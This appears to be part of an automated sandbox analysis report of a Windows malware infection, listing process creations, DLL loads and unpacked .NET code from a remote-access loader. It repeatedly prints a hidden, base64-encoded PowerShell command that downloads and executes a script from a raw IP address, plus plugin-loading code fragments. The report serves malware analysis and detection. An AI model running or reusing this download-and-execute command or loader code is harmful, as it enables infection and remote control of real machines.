            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA33.tmp" "c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP"Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdbhP source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\strztqek\strztqek.pdb source: powershell.exe, 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.28919871ea0.3.raw.unpack, Messages.cs.Net Code: Memory
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.289198619b0.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA4B9FA pushad ; retf 3_2_00007FFC3DA4BA11
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA439DB pushad ; ret 3_2_00007FFC3DA439E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA439C0 pushad ; ret 3_2_00007FFC3DA439E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA48163 push ebx; ret 3_2_00007FFC3DA4816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA47963 push ebx; retf 3_2_00007FFC3DA4796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA400BD pushad ; iretd 3_2_00007FFC3DA400C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFC3DA4C2D3 push FFFFFFE8h; retf 3_2_00007FFC3DA4C2F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_01587DA0 push eax; iretd 11_2_01587DA1
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, ZWeKHcACrqflnHUlpASkjftZHOBqiCGxfOorUAdZkrOmPIGpYAEYlDjUDfcSBktOKHgysCqOwSaRrgkZilrIXHlBFuOPykyaXZBh.csHigh entropy of concatenated method names: 'RNYIlZekYV', 'mhavghSDao', 'RJCZOJicBQ', 'lLjVWaHjOv', 'PRxdPInpFz', 'nbPGahkZUC', 'RcIhJAYfyf', 'zJPFyZmzjf', 'vSxbCkWCUO', 'QHpmDNjpto'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, -Module-.csHigh entropy of concatenated method names: 'WQChyCMOoB', 'wCjkjynTqS', 'RKXkReWkCV', 'TTOiWGlcOj', 'sLaZaapxZt', 'ICjuSlTsqu', 'GCmsHDNanD', 'mlehAfJXjQ', 'OzkimrKupK', 'NTLuDQzIsx'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, WlNthHBjXcLliiJhHxJhAKzvqeYihFnVggvyGqNpTtyeBZRdsNgtVPImMsdcIsbrPQfcMlAqJtohlvUqnVQuyTZryjMnnLHBrgpL.csHigh entropy of concatenated method names: 'UOqgmPJBBAaqyMOMBHTVQOECzndXMMQfgjwyFKhIkxPXjvPAXUZJntUfkNHZMLOOKUkpqphRAkLsYGtexDaSNgSMoqoRchWyIbno', 'IkpVvpJaAp', 'gjHDAsAUdE', 'SfqaMcihNU', 'IWSNOGKFWd', 'QulLcxMVnx', 'KczHMCUois', 'hCnFHkrUPT', 'HUXZOyTFXo', 'pmTpkFwkbl'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, fjqxEWSfhjmOpVWYVoOvOBjiLSFVYNUNstguePHXsMDdrnxqwJQVJdbDZiLMrXgtozwVPBTgHRdbXgQxuoyoXYdorCvWdVGuFkOS.csHigh entropy of concatenated method names: 'RBBUQKoSaZGSsorcySwqwiEmgXcLlIwNsYGSMEymJkorVCDPDDVMOxvJXpNSHDHrDTAuIzpUujHlUmrEunhHMJZUCXUxQFFgDWOc', 'fzteTUjlPR', 'tEJHzVjVTG', 'EuJQmHqtJM', 'pccXtzCaOw', 'rlRIPDtNTd', 'AvQyIKQCRm', 'EPBdCrCLnZ', 'sigxotDabJ', 'nCAFlTlEpI'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.csHigh entropy of concatenated method names: 'IdYgtYiQDowQnYykoJhMszjkajBdxBDlCqXCVrwJYasmeXSpcDnKeMniUNgkxftbKknXbWoXmxOrhWgcqmaUoThQcOIhlmmTGqBT', 'ghOQOHtMzy', 'jFkaIiHgJi', 'GEBMWCzsrI', 'VylGnmXvlj', 'lnfPjuyDiV', 'xUKSnBFbTm', 'hauQCLtEMv', 'lmUAXsyMDB', 'eWkwkaNtsL'
            Source: 3.2.powershell.exe.28931d60000.9.raw.unpack, kzkHNijcIBhDuDCjLWbDcxbZaqOsonKWseTXstfEWQeMjKwzFNNMaKmMykGxuROuRkkqJEQrRwGmtoQpToMBAYWIRgziMHkfbJVY.csHigh entropy of concatenated method names: 'AgPbWvUEdatktqDfenUToByCfIFjlBkJsSPNyLEfdsFRNoOvefbOPcKYHnWoPKsCPKSBBQGsIPPVWGPQTjfgzvTqhRflPpptadcc', 'nBbZnrWMZo', 'iPleMAxGCW', 'oFWsMbJdzJ', 'sTpzzBIjip', 'QBZCesxmDp', 'ccwsrHEInl', 'HSmpWpAMEk', 'RnymfNGuot', 'ExAkHpwWhS'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, ZWeKHcACrqflnHUlpASkjftZHOBqiCGxfOorUAdZkrOmPIGpYAEYlDjUDfcSBktOKHgysCqOwSaRrgkZilrIXHlBFuOPykyaXZBh.csHigh entropy of concatenated method names: 'RNYIlZekYV', 'mhavghSDao', 'RJCZOJicBQ', 'lLjVWaHjOv', 'PRxdPInpFz', 'nbPGahkZUC', 'RcIhJAYfyf', 'zJPFyZmzjf', 'vSxbCkWCUO', 'QHpmDNjpto'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, -Module-.csHigh entropy of concatenated method names: 'WQChyCMOoB', 'wCjkjynTqS', 'RKXkReWkCV', 'TTOiWGlcOj', 'sLaZaapxZt', 'ICjuSlTsqu', 'GCmsHDNanD', 'mlehAfJXjQ', 'OzkimrKupK', 'NTLuDQzIsx'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, WlNthHBjXcLliiJhHxJhAKzvqeYihFnVggvyGqNpTtyeBZRdsNgtVPImMsdcIsbrPQfcMlAqJtohlvUqnVQuyTZryjMnnLHBrgpL.csHigh entropy of concatenated method names: 'UOqgmPJBBAaqyMOMBHTVQOECzndXMMQfgjwyFKhIkxPXjvPAXUZJntUfkNHZMLOOKUkpqphRAkLsYGtexDaSNgSMoqoRchWyIbno', 'IkpVvpJaAp', 'gjHDAsAUdE', 'SfqaMcihNU', 'IWSNOGKFWd', 'QulLcxMVnx', 'KczHMCUois', 'hCnFHkrUPT', 'HUXZOyTFXo', 'pmTpkFwkbl'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, fjqxEWSfhjmOpVWYVoOvOBjiLSFVYNUNstguePHXsMDdrnxqwJQVJdbDZiLMrXgtozwVPBTgHRdbXgQxuoyoXYdorCvWdVGuFkOS.csHigh entropy of concatenated method names: 'RBBUQKoSaZGSsorcySwqwiEmgXcLlIwNsYGSMEymJkorVCDPDDVMOxvJXpNSHDHrDTAuIzpUujHlUmrEunhHMJZUCXUxQFFgDWOc', 'fzteTUjlPR', 'tEJHzVjVTG', 'EuJQmHqtJM', 'pccXtzCaOw', 'rlRIPDtNTd', 'AvQyIKQCRm', 'EPBdCrCLnZ', 'sigxotDabJ', 'nCAFlTlEpI'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, wmTozIgamPcaxfvFFmctQBuKKuDsAwVSEMuGqRGRpTdsOeOJUJNObIlUSjDfeNzQTjwKKOpOFkeXybVFGUyQIhRWBAOgnBNCtmyF.csHigh entropy of concatenated method names: 'IdYgtYiQDowQnYykoJhMszjkajBdxBDlCqXCVrwJYasmeXSpcDnKeMniUNgkxftbKknXbWoXmxOrhWgcqmaUoThQcOIhlmmTGqBT', 'ghOQOHtMzy', 'jFkaIiHgJi', 'GEBMWCzsrI', 'VylGnmXvlj', 'lnfPjuyDiV', 'xUKSnBFbTm', 'hauQCLtEMv', 'lmUAXsyMDB', 'eWkwkaNtsL'
            Source: 3.2.powershell.exe.2892963dd10.7.raw.unpack, kzkHNijcIBhDuDCjLWbDcxbZaqOsonKWseTXstfEWQeMjKwzFNNMaKmMykGxuROuRkkqJEQrRwGmtoQpToMBAYWIRgziMHkfbJVY.csHigh entropy of concatenated method names: 'AgPbWvUEdatktqDfenUToByCfIFjlBkJsSPNyLEfdsFRNoOvefbOPcKYHnWoPKsCPKSBBQGsIPPVWGPQTjfgzvTqhRflPpptadcc', 'nBbZnrWMZo', 'iPleMAxGCW', 'oFWsMbJdzJ', 'sTpzzBIjip', 'QBZCesxmDp', 'ccwsrHEInl', 'HSmpWpAMEk', 'RnymfNGuot', 'ExAkHpwWhS'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dllJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
